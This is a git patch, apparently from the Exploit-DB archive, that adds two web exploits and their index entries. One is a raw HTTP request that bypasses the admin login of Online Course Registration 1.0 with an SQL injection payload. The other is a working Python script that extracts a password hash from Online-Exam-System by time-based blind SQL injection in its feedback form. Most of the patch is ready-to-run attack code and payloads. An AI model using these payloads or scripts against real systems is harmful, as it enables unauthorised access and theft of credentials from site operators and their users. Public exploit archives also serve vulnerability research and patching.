From d0531a5e12527acac56c8c13c4b2fbe056850322 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Sat, 6 Jun 2020 05:01:55 +0000
Subject: [PATCH] DB: 2020-06-06

2 changes to exploits/shellcodes

Online Course Registration 1.0 - Authentication Bypass
Online-Exam-System 2015 - 'feedback' SQL Injection
---
 exploits/php/webapps/48559.txt | 40 ++++++++++++++++++++++++++++++++++
 exploits/php/webapps/48560.py  | 34 +++++++++++++++++++++++++++++
 files_exploits.csv             |  2 ++
 3 files changed, 76 insertions(+)
 create mode 100644 exploits/php/webapps/48559.txt
 create mode 100755 exploits/php/webapps/48560.py

diff --git a/exploits/php/webapps/48559.txt b/exploits/php/webapps/48559.txt
new file mode 100644
index 000000000..1cac98d7f
--- /dev/null
+++ b/exploits/php/webapps/48559.txt
@@ -0,0 +1,40 @@
+# Exploit Title: Online Course Registration 1.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-06-05
+# Exploit Author: BKpatron
+# Vendor Homepage: https://www.sourcecodester.com/php/14251/online-course-registration.html
+# Software Link:  https://www.sourcecodester.com/sites/default/files/download/razormist/online-course-registration.zip
+# Version: v1.0
+# Tested on: Win 10
+# CVE: N/A
+# my website: bkpatron.com
+
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : admin/index.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+
+http://localhost/Online%20Course%20Registration/admin/index.php
+
+POST /Online%20Course%20Registration/admin/index.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 61
+Referer: http://localhost/Online%20Course%20Registration/admin/index.php
+Cookie: PHPSESSID=il6a0lzq8ndo1bb4672rd7cr3m
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
+
+HTTP/1.1 302 Found
+Date: Thu, 04 Jun 2020 20:04:27 GMT
+Server: Apache/2.4.39 (Win64) PHP/7.3.5
+X-Powered-By: PHP/7.3.5
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+location: http://localhost/Online Course Registration/admin/change-password.php
\ No newline at end of file
diff --git a/exploits/php/webapps/48560.py b/exploits/php/webapps/48560.py
new file mode 100755
index 000000000..7e9fce954
--- /dev/null
+++ b/exploits/php/webapps/48560.py
@@ -0,0 +1,34 @@
+# Exploit Title: Online-Exam-System 2015 - 'feedback' SQL Injection
+# Date: 2020-06-04
+# Exploit Author: Gus Ralph
+# Vendor Homepage: https://github.com/sunnygkp10/
+# Software Link: https://github.com/sunnygkp10/Online-Exam-System-.git
+# Affected Version: 2015
+# Tested on: Ubuntu
+# CVE : N/A
+
+import requests, string, time
+from sys import stdout
+
+URL = raw_input("Please enter the URL to attack (example http://localhost/Online-Exam-System/)\n")
+
+payload = "feedback' , '2020-06-04', '01:58:10am'),('1337','test','test@test.com','test',(SELECT CASE WHEN (SELECT EXISTS(SELECT password FROM user WHERE password REGEXP BINARY '^"
+payload2 = ".*'))=1 THEN sleep(5) ELSE sleep(0) END),'2020-06-04', '01:58:10am'); -- -"
+so_far = hash = ""
+while True:
+	for i in string.digits + string.ascii_lowercase:
+		so_far = hash + i
+		payload_to_send = payload + str(so_far) + payload2
+		data = {"name":"test","email":"test@test.com","subject":"test","feedback":payload_to_send}
+		start = time.time()
+		r = requests.post(URL + "feed.php", data = data)
+		request_time = time.time() - start
+		if request_time > 5:
+			hash += i
+			stdout.write(i)
+			stdout.flush()
+			break
+	if len(hash) > 31:
+		stdout.write("\n")
+		print "Hash found: " + hash
+		break
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index ca945761d..1cf93bd8b 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42785,3 +42785,5 @@ id,file,description,date,author,type,platform,port
 48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
 48557,exploits/multiple/webapps/48557.py,"Cayin Signage Media Player 3.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple,
+48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php,
+48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php,